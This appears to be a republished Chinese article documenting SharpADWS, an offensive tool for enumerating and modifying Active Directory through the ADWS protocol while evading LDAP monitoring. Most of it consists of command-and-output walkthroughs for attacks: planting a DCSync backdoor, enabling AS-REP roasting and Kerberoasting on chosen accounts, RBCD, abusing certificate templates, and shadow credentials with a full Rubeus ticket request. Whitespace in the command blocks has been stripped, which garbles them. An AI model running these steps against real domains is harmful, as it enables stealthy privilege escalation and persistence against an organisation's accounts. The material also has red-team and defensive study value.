Overview
SharpADWS 是一个为 Red Teams 打造的 Active Directory 侦查和利用工具,其通过 Active Directory Web Services (ADWS) 协议收集并修改 Active Directory 数据。
通常情况下,枚举或操作 Active Directory 是通过 LDAP 协议进行的。SharpADWS 能够在不直接与 LDAP 服务器通信的情况下提取或修改 Active Directory 数据。在 ADWS 下,LDAP 查询被包装在一系列 SOAP 消息中,然后使用 NET TCP Binding 加密信道将它们发送到 ADWS 服务器。随后,ADWS 服务器在其本地解包 LDAP 查询并将其转发到运行在同一域控制器上的 LDAP 服务器。
在安装 Active Directory Domain Services (ADDS) 后,Active Directory Web Services (ADWS) 将自动开启,因此 SharpADWS 在所有域环境中具备通用型。
Good Point
使用 ADWS 进行 LDAP 后利用的主要好处之一是它相对不为人所知,由于 LDAP 流量不会通过网络发送,因此不容易被常见的监控工具检测到。ADWS 运行与 LDAP 完全不同的服务,可在 TCP 端口 9389 上使用,并使用 SOAP 协议作为其接口。
在研究 ADWS 时,我们注意到,由于它是 SOAP Web 服务,因此实际执行的 LDAP 查询是在域控制器本地完成的。这提供了许多有趣的副作用,结果证明是有利的。比如,在分析域控制器上的 LDAP 查询时,您可能会注意到查询源自 127.0.0.1日志,在许多情况下它们将被忽视。
这样做的第二个好处是该活动不会显示在 LDAPSearch 操作类型下的 DeviceEvents 中,这意味着可用的遥测数据非常少。
Protocol Implementation
SharpADWS 实现了 MS-ADDM、MS-WSTIM 和 MS-WSDS 协议的相关细节,您可以借助该项目的源码,轻松实现对 Active Directory Web Services 的以下操作:
- Enumerate:创建与指定的搜索查询过滤器相映射的上下文。
- Pull:在特定枚举的上下文中检索结果对象。
- Renew:更新指定枚举上下文的过期时间。
- GetStatus:获取指定枚举上下文的过期时间。
- Release:释放指定的枚举上下文。
- Delete:删除现有的对象。
- Get:从对象中检索一个或多个属性。
- Put:修改对象上的一个或多个属性的内容。
- Add:将指定的属性值添加到指定属性的值集中,如果目标对象上尚不存在该属性,则创建该属性。
- Replace:用操作中指定的值替换指定属性中的值集,如果目标对象上尚不存在该属性,则创建该属性。如果操作中没有指定值,则将删除当前指定属性上的所有值。
- Delete:从指定的属性中删除指定的属性值。如果没有指定值,则将删除所有值。如果目标对象上不存在指定的属性,则 PUT 请求失败。
- Create:创建一个新的对象。
Usage
命令行参数 -h 可用于显示以下使用信息:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 |
C:UsersMarcus>SharpADWS.exe-hSharpADWS1.0.0-beta-Copyright(c)2024WHOAMI(whoamianony.top)-hDisplaythishelpscreenConnectionoptions:-dSpecifydomainforenumeration-uUsernametouseforADWSConnection-pPasswordtouseforADWSConnectionSupportedmethods:CacheDumpallobjectSidstocachefileforAclmethodsAclEnumerateandanalyzeDACLsforspecifiedobjects,specificallyUsers,Computers,Groups,Domains,DomainControllersandGPOsDCSyncEnumerateallDCSync-capableaccountsandcansetDCSyncbackdoorsDontReqPreAuthEnumeratesallaccountsthatdonotrequirekerberospreauthentication,andcanenablethisoptionforaccountsKerberoastableEnumeratesallKerberoastableaccounts,andcanwriteSPNsforaccountsAddComputerAddamachineaccountwithinthescopeofms-DS-MachineAccountQuotaforRBCDattackRBCDRead,writeandremovemsDS-AllowedToActOnBehalfOfOtherIdentityattributesforResource-BasedConstrainedDelegationattackCertifyEnumerateallADCSdatalikeCertify.exe,andcanwritetemplateattributesWhiskerList,addandremovemsDS-KeyCredentialLinkattributelikeWhisker.exeforShadowCredentialsattackFindDelegationEnumeratealldelegationrelationshipsforthetargetdomainAcloptions:-dnRFC2253DNtobasesearchfrom-scopeSetyourScope,supportBase(Default),Onelevel,Subtree-trusteeThesAMAccountNameofasecurityprincipaltocheckforitseffectivepermissions-rightFilterDACLforaspecificADrights-ridSpecifyaridvalueandfilteroutDACLthatsecurityprincipal's rid is greater than it -user Enumerate DACL for all user objects -computer Enumerate DACL for all computer objects -group Enumerate DACL for all group objects -domain Enumerate DACL for all domain objects -domaincontroller Enumerate DACL for all domain controller objects -gpo Enumerate DACL for all gpo objects DCSync options: -action [{list, write}] Action to operate on DCSync method list List all accounts with DCSync permissions write Escalate accounts with DCSync permissions -target Specify the sAMAccountName of the account DontReqPreAuth options: -action [{list, write}] Action to operate on DontReqPreAuth method list List all accounts that do not require kerberos preauthentication write Enable do not require kerberos preauthentication for an account -target Specify the sAMAccountName of the account Kerberoastable options: -action [{list, write}] Action to operate on Kerberoastable method list List all kerberoastable accounts write Write SPNs for an account to kerberoast -target Specify the sAMAccountName of the account AddComputer options: -computer-name Name of computer to add, without '$' suffix -computer-pass Password to set for the computer RBCD options: -action [{read,write,remove}] Action to operate on RBCD method read Read the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the account write Write the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the account remove Remove the msDS-AllowedToActOnBehalfOfOtherIdentity attribute value of the account added by the write action Certify options: -action [{find, modify}] Action to operate on Certify method find Find all CA and certificate templates modify Modify certificate templates -enrolleeSuppliesSubject Enumerate certificate templates with CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag for find action, and can enable CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag for modify action -clientAuth Enumerate certificate templates with client authentication pKIExtendedKeyUsage for find action, and can enable Client Authentication for modify action Whisker options: -action [{list, add, remove}] Action to operate on ShadowCredentials method list List all the values of the msDS-KeyCredentialLink attribute for an account add Add a new value to the msDS-KeyCredentialLink attribute for an account remove Remove a value from the msDS-KeyCredentialLink attribute for an account -device-id Specify the DeviceID to remove -target Specify the sAMAccountName of the account FindDelegation options: No options, just run! |
Cache
SharpADWS 在枚举 ACL 时,为了不对每个未知的受托者对象执行额外的 ADWS 请求,需要提前通过 cache method 创建所有账户对象的完整缓存并将其保存到文件中,从而避免产生大量(不必要的)流量。该缓存包含当前域内每个账户对象名称与其 objectSid 的映射。
1 2 3 4 |
C:UsersMarcus>SharpADWS.exeCache[*]Cachefilehasbeengenerated:object.cache |
Acl
Acl method 能够枚举指定 -dn 的对象的 DACL,并且支持通过 -trustee、-right 和 -rid 参数对枚举出的 DACL 进行筛选。比如,我们要枚举所有的 Domain Controller 对象,并筛选出受托者为 Marcus 的 DACL,如下所示:
1 2 3 4 5 6 7 8 9 10 |
C:UsersMarcus>SharpADWS.exeacl-dn"OU=Domain Controllers,DC=corp,DC=local"-scopeSubtree-trusteeMarcusSeverity:CriticalObjectDN:CN=DC01,OU=DomainControllers,DC=corp,DC=localAccessControlType:AllowActiveDirectoryRights:ListChildren,ReadProperty,GenericWriteObjectType:AllTrustee:MarcusIsInherited:False |
又比如,我们要枚举所有的 User 对象,并筛选出权限为 GenericWrite,受托者的 RID 大于 1000 的 DACL,如下所示:
1 2 3 4 5 6 7 8 9 10 |
C:UsersMarcus>SharpADWS.exeacl-dn"CN=Users,DC=corp,DC=local"-scopeSubtree-rightGeneric-rid1000Severity:CriticalObjectDN:CN=Bob,CN=Users,DC=corp,DC=localAccessControlType:AllowActiveDirectoryRights:ListChildren,ReadProperty,GenericWriteObjectType:AllTrustee:MarcusIsInherited:False |
此外,Acl method 还支持对特定对象的枚举:
1 2 3 4 5 6 |
SharpADWS.exeacl-user# Enumerate DACL for all user objectsSharpADWS.exeacl-computer# Enumerate DACL for all computer objectsSharpADWS.exeacl-group# Enumerate DACL for all group objectsSharpADWS.exeacl-domain# Enumerate DACL for all domain objectsSharpADWS.exeacl-domaincontroller# Enumerate DACL for all domain controller objectsSharpADWS.exeacl-gpo# Enumerate DACL for all gpo objects |
需要注意的是,Acl Method 的使用必须依赖于已经通过 Cache Method 建立的映射缓存。
DCSync
DCSync method 的 list 能够查询出所有被授予了 DS-Replication-Get-Changes、DS-Replication-Get-Changes-All 和 DS-Replication-Get-Changes-In-Filtered-Set 权限的账户,如下所示:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
C:UsersMarcus>SharpADWS.exeDCSync-actionlistSeverity:InfoObjectDN:DC=corp,DC=localAccessControlType:AllowActiveDirectoryRights:ExtendedRightObjectType:DS-Replication-Get-Changes-AllTrustee:AdministratorsIsInherited:FalseSeverity:InfoObjectDN:DC=corp,DC=localAccessControlType:AllowActiveDirectoryRights:ExtendedRightObjectType:DS-Replication-Get-Changes-AllTrustee:DomainControllersIsInherited:FalseSeverity:CriticalObjectDN:DC=corp,DC=localAccessControlType:AllowActiveDirectoryRights:ExtendedRightObjectType:DS-Replication-Get-Changes-AllTrustee:AliceIsInherited:False |
需要注意的是,DCSync Method 的 list 必须依赖于已经通过 Cache Method 建立的映射缓存。
此外,在拥有足够权限的情况下,您可以通过 write 为某个账户授予 DCSync 权限,以建立域持久性后门:
1 2 3 4 |
C:UsersMarcus>SharpADWS.exeDCSync-actionwrite-targetMarcus[*]AccountMarcusnowhasDCSyncpriviegesonthedomain. |
DontReqPreAuth
DontReqPreAuth method 的 list 能够查找出所有设置了 “Do not require kerberos preauthentication” 选项的账户,如下所示:
1 2 3 4 5 6 7 |
C:UsersMarcus>SharpADWS.exeDontReqPreAuth-actionlist[*]Foundusersthatdonotrequirekerberospreauthentication:[*]CN=Bob,CN=Users,DC=corp,DC=local[*]CN=Alice,CN=Users,DC=corp,DC=local[*]CN=John,CN=Users,DC=corp,DC=local |
此外,您可以滥用对目标账户 userAccountControl 属性的 WriteProperty 权限,通过 write 为该账户启用 “Do not require kerberos preauthentication” 选项,以执行 AS-REP Roasting 攻击:
1 2 3 4 |
C:UsersMarcus>SharpADWS.exeDontReqPreAuth-actionwrite-targetAdministrator[*]SetDontReqPreAuthforuserAdministratorsuccessfully! |
Kerberoastable
Kerberoastable method 的 list 能够查找出所有设置了 SPN 的账户,如下所示:
1 2 3 4 5 6 7 8 9 10 11 |
C:UsersMarcus>SharpADWS.exeKerberoastable-actionlist[*]Foundkerberoastableusers:[*]CN=krbtgt,CN=Users,DC=corp,DC=local[*]kadmin/changepw[*]CN=Bob,CN=Users,DC=corp,DC=local[*]WWW/win-iisserver.corp.local/IIS[*]TERMSERV/win-iisserver.corp.local[*]CN=John,CN=Users,DC=corp,DC=local[*]TERMSERV/WIN-SERVER2026 |
此外,您可以滥用对目标账户 servicePrincipalName 属性的 WriteProperty 权限,通过 write 为该账户(仅限于用户账户)添加一个 SPN,以执行 Kerberoasting 攻击:
1 2 3 4 |
C:UsersMarcus>SharpADWS.exeKerberoastable-actionwrite-targetAdministrator[*]KerberoastuserAdministratorsuccessfully! |
AddComputer
AddComputer method 允许您在 ms-DS-MachineAccountQuota 属性值限制的范围内创建一个新的计算机账户,该极其账户可用于后续的 RBCD 攻击中使用。
1 2 3 4 |
C:UsersMarcus>SharpADWS.exeAddComputer-computer-namePENTEST$-computer-passPassw0rd[*]SuccessfullyaddedmachineaccountPENTEST$withpasswordPassw0rd. |
RBCD
RBCD method 的 read 能够读取指定账户对象的 msDS-AllowedToActOnBehalfOfOtherIdentity 属性值,以检查谁有权限对该账户进行资源委派,如下所示:
1 2 3 4 5 6 7 |
C:UsersMarcus>SharpADWS.exeRBCD-actionread-delegate-toDC01$[*]Accountsallowedtoactonbehalfofotheridentity:[*]WIN-IISSERVER$(S-1-5-21-1315326963-2851134370-1073178800-1106)[*]WIN-MSSQL$(S-1-5-21-1315326963-2851134370-1073178800-1103)[*]WIN-PC8087$(S-1-5-21-1315326963-2851134370-1073178800-1117) |
RBCD method 的 write 能够写入目标账户对象的 msDS-AllowedToActOnBehalfOfOtherIdentity 属性,以进行 Resource-Based Constrained Delegation 攻击。如下所示,我们首先用 AddComputer method 创建了一个新的极其账户 PENTEST$,然后我们可以执行以下命令,将 PENTEST$ 的 SID 写入 DC01$ 的 msDS-AllowedToActOnBehalfOfOtherIdentity 属性中:
1 2 3 4 5 6 7 |
C:UsersMarcus>SharpADWS.exeRBCD-actionwrite-delegate-toDC01$-delegate-fromPENTEST$[*]Delegationrightsmodifiedsuccessfully![*]PENTEST$cannowimpersonateusersonDC01$viaS4U2Proxy[*]Accountsallowedtoactonbehalfofotheridentity:[*]PENTEST$(S-1-5-21-1315326963-2851134370-1073178800-1113) |
此外,通过 remove 可以将 write 中添加的 SID 从目标对象的 msDS-AllowedToActOnBehalfOfOtherIdentity 属性中移除:
1 2 3 4 5 6 |
C:UsersMarcus>SharpADWS.exeRBCD-actionremove-delegate-toDC01$-delegate-fromPENTEST$[*]Delegationrightsmodifiedsuccessfully![*]Accountsallowedtoactonbehalfofotheridentityhasbeenremoved:[*]PENTEST$(S-1-5-21-1315326963-2851134370-1073178800-1113) |
Certify
Certify method 的 find 能够像 Certify 一样枚举 ADCS 中的数据,包括所有的证书颁发机构和证书模版:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 |
C:UsersMarcus>SharpADWS.exeCertify-actionfind[*]FindCAandcertificatetemplates[*]Usingthesearchbase'CN=Configuration,DC=corp,DC=local'[*]ListinginfoabouttheEnterpriseCA'corp-DC01-CA'EnterpriseCAName:corp-DC01-CADNSName:DC01.corp.localFullName:DC01.corp.localcorp-DC01-CACertificateSubject:CN=corp-DC01-CA,DC=corp,DC=localCertificateSerialNumber:2D975C2D49AE4BB7432682E1708C8834CertificateValidityStart:2/13/20245:55:36PMCertificateValidityEnd:2/13/20296:05:36PMCAPermissions:EnrollmentRights::AuthenticatedUsersObjectControlPermissions:ManageCA::EnterpriseAdmins:DC01:DomainAdminsManageCertificates::EnterpriseAdmins:DC01WriteDacl::EnterpriseAdmins:DC01:DomainAdminsWriteOwner::EnterpriseAdmins:DC01:DomainAdminsWriteProperty::EnterpriseAdmins:DC01:DomainAdmins[*]AvailableCertificatesTemplatesCAName:CORP-DC01-CATemplateName:UserEnabled:TrueClientAuthentication:TrueEnrollmentAgent:FalseAnyPurpose:FalseEnrolleeSuppliesSubject:FalsepKIExtendedKeyUsage:EncryptingFileSystemSecureEmailClientAuthenticationmsPKI-Certificate-Name-Flag:SUBJECT_ALT_REQUIRE_UPNSUBJECT_ALT_REQUIRE_EMAILSUBJECT_REQUIRE_EMAILSUBJECT_REQUIRE_DIRECTORY_PATHmsPkI-Enrollment-Flag:INCLUDE_SYMMETRIC_ALGORITHMSPUBLISH_TO_DSAUTO_ENROLLMENTmsPKI-Private-Key-Flag:EXPORTABLE_KEYCAPermissions:EnrollmentRights::DomainAdmins:DomainUsers:EnterpriseAdminsObjectControlPermissions:WriteDacl::DomainAdmins:EnterpriseAdminsWriteOwner::DomainAdmins:EnterpriseAdminsWriteProperty::DomainAdmins:EnterpriseAdmins:DomainUsersCAName:TemplateName:UserSignatureEnabled:FalseClientAuthentication:TrueEnrollmentAgent:FalseAnyPurpose:FalseEnrolleeSuppliesSubject:FalsepKIExtendedKeyUsage:SecureEmailClientAuthenticationmsPKI-Certificate-Name-Flag:SUBJECT_ALT_REQUIRE_UPNSUBJECT_ALT_REQUIRE_EMAILSUBJECT_REQUIRE_EMAILSUBJECT_REQUIRE_DIRECTORY_PATHmsPkI-Enrollment-Flag:AUTO_ENROLLMENTmsPKI-Private-Key-Flag:ATTEST_NONECAPermissions:EnrollmentRights::DomainAdmins:DomainUsers:EnterpriseAdminsObjectControlPermissions:WriteDacl::DomainAdmins:EnterpriseAdminsWriteOwner::DomainAdmins:EnterpriseAdminsWriteProperty::DomainAdmins:EnterpriseAdmins:DomainUsers# ... |
此外, find 支持 -enrolleeSuppliesSubject 和 -clientAuth 选项,能够筛选出所有开启了 CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT 标志和支持 Client Authentication 的证书模版:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 |
C:UsersMarcus>SharpADWS.exeCertify-actionfind-enrolleeSuppliesSubject-clientAuth[*]FindCAandcertificatetemplates[*]Usingthesearchbase'CN=Configuration,DC=corp,DC=local'[*]ListinginfoabouttheEnterpriseCA'corp-DC01-CA'# ...[*]AvailableCertificatesTemplatesCAName:CORP-DC01-CATemplateName:UserEnabled:TrueClientAuthentication:TrueEnrollmentAgent:FalseAnyPurpose:FalseEnrolleeSuppliesSubject:TruepKIExtendedKeyUsage:EncryptingFileSystemSecureEmailClientAuthenticationmsPKI-Certificate-Name-Flag:ENROLLEE_SUPPLIES_SUBJECTSUBJECT_ALT_REQUIRE_UPNSUBJECT_ALT_REQUIRE_EMAILSUBJECT_REQUIRE_EMAILSUBJECT_REQUIRE_DIRECTORY_PATHmsPkI-Enrollment-Flag:INCLUDE_SYMMETRIC_ALGORITHMSPUBLISH_TO_DSAUTO_ENROLLMENTmsPKI-Private-Key-Flag:EXPORTABLE_KEYCAPermissions:EnrollmentRights::DomainAdmins:DomainUsers:EnterpriseAdminsObjectControlPermissions:WriteDacl::DomainAdmins:EnterpriseAdminsWriteOwner::DomainAdmins:EnterpriseAdminsWriteProperty::DomainAdmins:EnterpriseAdmins:Marcus:DomainUsers# ... |
需要注意的是,Certify Method 的 find 必须依赖于已经通过 Cache Method 建立的映射缓存。
Certify method 的 modify 允许您在拥有对目标模版的写入权限下,修改证书模版的属性,例如开启 CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT 标志或启用 Client Authentication:
1 2 3 4 5 |
C:UsersMarcus>SharpADWS.exeCertify-actionmodify-templateUser-enrolleeSuppliesSubject-clientAuth[*]EnableenrolleesuppliessubjectfortemplateUsersuccessfully![*]EnableclientauthenticationfortemplateUsersuccessfully! |
Whisker
Whisker method 能够像 Whisker 一样执行 ShadowCredentials 攻击的生命周期。
Whisker method 的 list 能够列出目标账户对象的 msDS-KeyCredentialLink 属性值:
1 2 3 4 5 6 7 |
C:UsersMarcus>SharpADWS.exeWhisker-actionlist-targetDC01$[*]ListdevicedforDC01$:[*]DeviceID:c9fdae6b-f6a1-4880-a498-6dc89814e596CreationTime:2/13/20247:43:49PM[*]DeviceID:ee48b31f-71b1-4821-b21e-1ca28fad2ae9CreationTime:2/13/20248:06:52PM[*]DeviceID:80c31faf-8b0b-4af6-8350-22de2d91a4fdCreationTime:2/13/20248:01:50PM |
Whisker method 的 add 允许您在拥有写入权限的情况下,为目标账户的 msDS-KeyCredentialLink 属性添加一个 Key,以执行 ShadowCredentials 攻击:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 |
C:UsersMarcus>SharpADWS.exeWhisker-actionadd-targetAdministrator-cert-passPassw0rd[*]Certificategeneraged[*]KeyCredentialgeneratedwithDeviceID7d9e0151-5fd2-46d5-ac3d-dce8a71399f2[*]UpdatedthemsDS-KeyCredentialLinkattributesuccessfully![*]YoucannowrunRubeuswiththefollowingsyntax:Rubeus.exeasktgt/user:Administrator/certificate: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/password:"Passw0rd"/domain:corp.local/getcredentials/show |
此外,通过 remove,您可以提供 -device-id 将指定的 Key 从目标对象的 msDS-KeyCredentialLink 属性中移除:
1 2 3 4 5 6 |
C:UsersMarcus>SharpADWS.exeWhisker-actionremove-targetDC01$-device-idc9fdae6b-f6a1-4880-a498-6dc89814e596[*]Foundvaluetoremove[*]msDS-KeyCredentialLinkvaluehasbeenremoved:[*]DeviceID:c9fdae6b-f6a1-4880-a498-6dc89814e596CreationTime:2/13/20247:43:49PM |
FindDelegation
FindDelegation method 能够枚举出当前域内所有的委派关系,该 method 没有多余的选项或参数:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
C:UsersMarcusdesktop>SharpADWS.exeFindDelegationAccountNameAccountTypeDelegationTypeDelegationRightsTo------------------------------------------------------------------------------------------------------DC01$ComputerUnconstrainedN/APENTEST$ComputerResource-BasedConstrainedDC01$WIN-MSSQL$ComputerConstrainedw/ProtocolTransitionldap/DC01.corp.local/corp.localWIN-MSSQL$ComputerConstrainedw/ProtocolTransitionldap/DC01.corp.localWIN-MSSQL$ComputerConstrainedw/ProtocolTransitionldap/DC01WIN-MSSQL$ComputerConstrainedw/ProtocolTransitionldap/DC01.corp.local/CORPWIN-MSSQL$ComputerConstrainedw/ProtocolTransitionldap/DC01/CORPWIN-MSSQL$ComputerConstrainedw/ProtocolTransitionldap/DC01.corp.local/DomainDnsZones.corp.localWIN-MSSQL$ComputerConstrainedw/ProtocolTransitionldap/DC01.corp.local/ForestDnsZones.corp.localWIN-PC8087$ComputerConstrainedw/ProtocolTransitioncifs/DC01.corp.local/corp.localWIN-PC8087$ComputerConstrainedw/ProtocolTransitioncifs/DC01.corp.localWIN-PC8087$ComputerConstrainedw/ProtocolTransitioncifs/DC01WIN-PC8087$ComputerConstrainedw/ProtocolTransitioncifs/DC01.corp.local/CORPWIN-PC8087$ComputerConstrainedw/ProtocolTransitioncifs/DC01/CORP |
原文始发于微信公众号(实战攻防安全):SharpADWS - 滥用 ADWS 协议枚举 Active Directory
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论